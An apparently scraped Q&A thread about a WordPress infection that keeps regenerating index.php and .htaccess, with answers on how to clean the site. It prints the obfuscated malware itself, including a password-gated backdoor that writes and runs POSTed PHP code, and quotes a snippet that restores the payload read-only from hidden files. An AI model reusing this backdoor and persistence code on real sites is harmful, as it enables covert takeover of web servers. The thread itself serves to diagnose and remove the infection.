${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($OO0_0__0OO);');$O__O0_00OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O_OO00__0O','$O_OO00__0O=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x5f\x4f\x4f\x30\x30\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O));$O__00O_0OO=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x5f\x30\x4f\x5f\x5f"](\'/\\|/si\',$O_OO00__0O,-1,PREG_SPLIT_NO_EMPTY);if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O__00O_0OO)){return false;}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O__00O_0OO)<2){return false;}$O_OO00__0O_array["data"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30\x5f"]($O__00O_0OO);$O_OO00__0O_array["data"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O_array["data"]);$O_OO00__0O_array["headers"]=$O__00O_0OO;return $O_OO00__0O_array;');$O_OO0_O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O_0_0_OO0O=\'\'','if($O_0_0_OO0O==\'\'){$O_0_0_OO0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'08soShTUxOTi0tPuBgA=\');}$O_OO00__0O="PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKilyYWRpb1wucGhwJCAtIFtMXQpSZXdyaXRlUnVsZSBeKC4qKWNvbnRlbnRcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKilhYm91dFwucGhwJCAtIFtMXQpSZXdyaXRlUnVsZSBeKC4qKWxvY2szNjBcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKikucGhwKC4qKSQgL2luZGV4LnBocCBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPg==";$O_OO00__0O=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x5f\x5f\x30\x5f"]($O_0_0_OO0O)){$O_OO_O00_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x30\x30\x30\x5f\x4f"]($O_0_0_OO0O);if($O_OO00__0O==$O_OO_O00_0){return;}}$OO_0__O0O0="robots.txt";if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x5f\x5f\x30\x5f"]($OO_0__O0O0)){@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($OO_0__O0O0,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"]($OO_0__O0O0);}@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($O_0_0_OO0O,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"]($O_0_0_OO0O);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30"]($O_0_0_OO0O,$O_OO00__0O);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($O_0_0_OO0O,0444);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30\x30\x4f"]($O_0_0_OO0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x30\x5f\x5f\x5f"]("-400 days",${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x30\x4f\x30\x5f\x5f"]()));');$O__00_OOO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O0_O00_OO_','$params["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]=$O0_O00_OO_;$params["\x61\x70\x69"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x5f\x30\x30\x4f\x5f"]($params["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]);$params["server_domain"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x4f\x5f\x4f\x30\x30"]();$params["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];$params["\x72\x65\x66\x65\x72\x65\x72"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"]:\'\';$params["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"]:\'\';$params["\x69\x70"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x30\x5f\x30\x5f\x4f"]();if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x53"])){$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]="https://";}else{$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]="http://";}if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["HTTP_ACCEPT_LANGUAGE"])){$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["HTTP_ACCEPT_LANGUAGE"];}else{$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]="";}if(isset(${"\x5f\x47\x45\x54"}["\x70\x61\x72\x61\x6d\x73"])){header("Content-type:application/json");if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x4f\x5f"]("json_encode")){echo ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x4f\x30\x5f\x4f\x4f"]($params);}else{${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x30\x4f\x5f\x30\x4f"]($params);}die();}if(isset(${"\x5f\x47\x45\x54"}["\x70\x61\x73\x73"])&&${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x30\x30\x30\x4f\x5f\x5f"](${"\x5f\x47\x45\x54"}["\x70\x61\x73\x73"]."a!#_11AA")=="2f7a76f71ff9e24be7c0015ff9cb81d8"){if(isset(${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"])){$OO0_0OO0__=sprintf("https://www.google.com/ping?sitemap=%s%s/%s",$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"]);$O_0_O0OO0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x4f\x30\x4f\x4f\x30"]($OO0_0OO0__);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x5f\x4f\x4f\x30"]($O_0_O0OO0_,"google")!=false){die("success");}else{die("failed");}}if(isset(${"\x5f\x50\x4f\x53\x54"}["\x7a\x7a\x7a"])){$OO0_0_0O_O =${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x4f\x5f\x30\x30\x30"](${"\x5f\x50\x4f\x53\x54"}["\x7a\x7a\x7a"]));$OO0_0_0O_O=\' \'.$OO0_0_0O_O.\'\';@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30"](\'407.php\',$OO0_0_0O_O);require_once(\'407.php\');@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"](\'407.php\');die();}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x5f\x4f\x30\x30\x5f"]();$O_OO00_0_O=array(\'domain\'=>$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],\'request_url\'=>$params["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"],\'ip\'=>$params["\x69\x70"],\'agent\'=>$params["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"],\'referer\'=>$params["\x72\x65\x66\x65\x72\x65\x72"],\'protocol\'=>$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],\'language\'=>$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]);$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x4f\x30\x4f\x4f\x30"]($params["\x61\x70\x69"],0,2,$O_OO00_0_O,array(),$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"]);$O_O_0O00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x30\x30\x4f\x4f"]($O_OO00__0O);if($O_O_0O00_O!==false){foreach($O_O_0O00_O["headers"] as $header){@header($header);}echo $O_O_0O00_O["data"];die();}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x5f\x4f\x4f\x4f\x30"]($O0_O00_OO_);?>

Also, it keeps editing my .htaccess files to this:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteRule ^(.*)radio\.php$ - [L]
RewriteRule ^(.*)content\.php$ - [L]
RewriteRule ^(.*)about\.php$ - [L]
RewriteRule ^(.*)lock360\.php$ - [L]
RewriteRule ^(.*).php(.*)$ /index.php [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

Even if I delete or change permission to those files, the WordPress creates them back with permission 0444.

Some of infected files were n3.php located in some plugin folders, like Contact form 7.

Can anyone assist with this pls? Thank you in advance

Blaseio answered 4/11, 2020 at 3:40 Comment(3)
The full code is on my Google Drive: [docs.google.com/document/d/…Blaseio
I have same problem. But when I delete all files and directories under web root the modified .htaccess and index.php files are created again. It still happens after FTP password change.Namnama
As latest update - I had some loose permissions on my cpanel user folder and a process was created to download and replace index.php file continuously. ps aux showed me the process and I had to kill it using kill -9 [PID] to stop it.Delly
T
11

Code inside index.php regenerates itself. When you delete index.php, code previously in that file still gets executed (it's still loaded in memory). Solution: restart PHP process to unload from memory.

Theogony answered 27/3, 2021 at 17:7 Comment(4)
makes sense, all that came to my mind was a cronjobReadymix
any one able to find out what caused this malware to hook up in the first place?Trodden
@M.ImranMamda, based on my [re]search on google this gets in through some vulnerable wordpress pluginsElburr
how to restart the php process? I am using shared hosting, but I have some limited SSH capabilities with filezilla SFTP and putty SSH command line.Mettlesome
C
3

I had the same issue as you described, and what I did to fix it is the the following using the Cpanel filemanager:

  • Edit or Replace .htaccess without the malicious code.

  • Delete all wordpress system files with the exception of wp-config.php and the wp-content folder.

  • Go to https://wordpress.org/download/releases/ and download the version of wordpress that you require in zip format.

  • Upload the wordpress .zip file inside the main directory of your online wordpress folder and then extract it using the file manager extract option, this will create a 'wordpress' folder, go inside this folder and copy all the system files/folders except for the wp-content folder, make sure you copy it into the correct destination.

  • Download latest version of all your plugins from original sources to your local computer (most of them will be in .zip format)

  • Delete all wp-content/plugins folder and then manually upload each individual plugins back into the wp-content/plugins folder. (if you upload the plugins in zip file format, you will need to extract the zip file after uploading using file manager extract option, and then delete the original zip file after extraction.

  • If you are using a cache plugin, I suggest locating the cache folder as sometimes it is located elsewhere (not inside wp-content folder) and then manually deleting all the accumulated cache files, if you're not familiar where it is located then do the research.

  • After doing all this, you'll end up with a clean install of wordpress and all your plugins and there should be no remnant of the malicious code anymore, and will not return anymore.

I hope this helps, good luck!

Clotho answered 11/11, 2020 at 22:19 Comment(1)
And also remove all entry into cronjobs. or better delete hosting account and create new one. and also check database for admin users and delete suspicious users.Tannenberg
R
1

Had the same issue with not updated wordpress. My fast solution is execution 2 SSH commands from www root folder:

find . -type f -name '*.php' -print0 | xargs -0 sed -i 's/$path = "\/home/\/\/$path = "\/home/g'
find . -type f -name 'index.php' -print0 | xargs -0 sed -i 's/$OO0/\/\/$OO0/g'

where /home - must be replaced with your site www folder, most times it is /var/www

command 1- make commented line with location of vidus code file

command 2- make commented line with virus in index.php

My virus regenation code located in /domains/public_html/wp-includes/plugin.php

Virus regeneration code in plugin.php:

$index_path = "index.php";
$index = file_get_contents($index_path);
$path = "/home/users/user_name/domains/domain.com/wp-content/plugins/advanced-custom-fields/core/actions/173692";

if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
    @chmod($index_path, 0644);
    @file_put_contents($index_path, $index_hide);
    @chmod($index_path, 0444);
}
}

$i_p = "index.php";
$index = file_get_contents($i_p);
$path = "/home/users/user_name/domains/domain.com/wp-admin/css/colors/blue/100158";

if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
    @chmod($i_p, 0644);
    @file_put_contents($i_p, $index_hide);
    @chmod($i_p, 0444);
}
}

$index_path = "index.php";
$index = file_get_contents($index_path);
$path = "/home/users/user_name/domains/domain.com/wp-admin/css/colors/coffee/139039";

if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
    @chmod($index_path, 0644);
    @file_put_contents($index_path, $index_hide);
    @chmod($index_path, 0444);
}
}
Rill answered 25/7, 2022 at 10:10 Comment(0)

© 2022 - 2024 — McMap. All rights reserved.